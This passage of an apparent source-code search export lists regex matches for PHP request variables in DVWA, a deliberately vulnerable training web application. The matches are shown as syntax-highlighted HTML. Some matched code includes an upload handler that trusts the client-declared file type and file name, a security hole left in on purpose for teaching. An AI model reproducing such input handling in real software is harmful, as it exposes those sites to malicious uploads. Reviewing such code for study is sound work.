  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span 
class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 271,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token 
punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
  "line": 10,
  "start": 5,
  "end": 16,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 272,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token 
operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> ",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 273,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token 
variable\">$target_path</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> No\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>Your image was not uploaded.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t}\n<span class=\"line-number\">22:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">23:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Yes!",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 27,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">38:</span> return <span class=\"token variable\">$data</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">39:</span> }\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Clear PHPIDS log\n<span class=\"line-number\">42:</span> function <span class=\"token function\">dvwaClearIdsLog</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\t{\n<span class=\"highlight\"><span class=\"line-number\">43:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'clear_log'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token variable\">$fp</span> <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS_LOG<span class=\"token punctuation\">,</span> w <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">45:</span> \t\t<span class=\"token function\">fclose</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$fp</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">46:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS log cleared\"</span> <span class=\"token punctuation\">)</span><span class=\"token 
comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">47:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \t}",
  "line": 43,
  "start": 38,
  "end": 49,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 28,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">58:</span> \t\t<span class=\"token operator\">*</span> Please keep <span class=\"token keyword\">in</span> mind what array_merge does <span class=\"token operator\">and</span> how this might interfer\n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token keyword\">with</span> your variables_order settings\n<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span>\n<span class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> \n<span class=\"line-number\">68:</span> \t\t<span 
class=\"token variable\">$init</span> <span class=\"token operator\">=</span> IDS_Init<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">init</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/Config/Config.ini'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 63,
  "start": 58,
  "end": 69,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 41,
  "file": "/home/chris/src/DVWA-master/instructions.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">15:</span> \t<span class=\"token string\">'changelog'</span>      <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'legend'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'Change Log'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'file'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'CHANGELOG.md'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token string\">'copying'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'legend'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'Copying'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'file'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'COPYING.txt'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token string\">'PHPIDS-license'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'legend'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'PHPIDS License'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'file'</span> 
<span class=\"token operator\">=</span><span class=\"token operator\">></span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'LICENSE'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">18:</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"highlight\"><span class=\"line-number\">20:</span> <span class=\"token variable\">$selectedDocId</span> <span class=\"token operator\">=</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'doc'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'doc'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$selectedDocId</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$docs</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$selectedDocId</span> <span class=\"token operator\">=</span> <span class=\"token string\">'readme'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span 
class=\"line-number\">23:</span> }\n<span class=\"line-number\">24:</span> <span class=\"token variable\">$readFile</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$docs</span><span class=\"token punctuation\">[</span> <span class=\"token variable\">$selectedDocId</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'file'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> ",
  "line": 20,
  "start": 15,
  "end": 26,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 50,
  "file": "/home/chris/src/DVWA-master/security.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">33:</span> \t<span class=\"token function\">dvwaSecurityLevelSet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$securityLevel</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">34:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Security level set to {$securityLevel}\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">36:</span> }\n<span class=\"line-number\">37:</span> \n<span class=\"highlight\"><span class=\"line-number\">38:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string\">'phpids'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">39:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">40:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'on'</span><span class=\"token punctuation\">:</span>\n<span 
class=\"line-number\">41:</span> \t\t\t<span class=\"token function\">dvwaPhpIdsEnabledSet</span><span class=\"token punctuation\">(</span> <span class=\"token boolean\">true</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \t\t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS is now enabled\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">43:</span> \t\t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 38,
  "start": 33,
  "end": 44,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 51,
  "file": "/home/chris/src/DVWA-master/security.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">34:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Security level set to {$securityLevel}\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">36:</span> }\n<span class=\"line-number\">37:</span> \n<span class=\"line-number\">38:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string\">'phpids'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">39:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">40:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'on'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">41:</span> \t\t\t<span class=\"token function\">dvwaPhpIdsEnabledSet</span><span class=\"token punctuation\">(</span> <span class=\"token boolean\">true</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> 
\t\t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS is now enabled\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">43:</span> \t\t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'off'</span><span class=\"token punctuation\">:</span>",
  "line": 39,
  "start": 34,
  "end": 45,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 63,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 64,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token 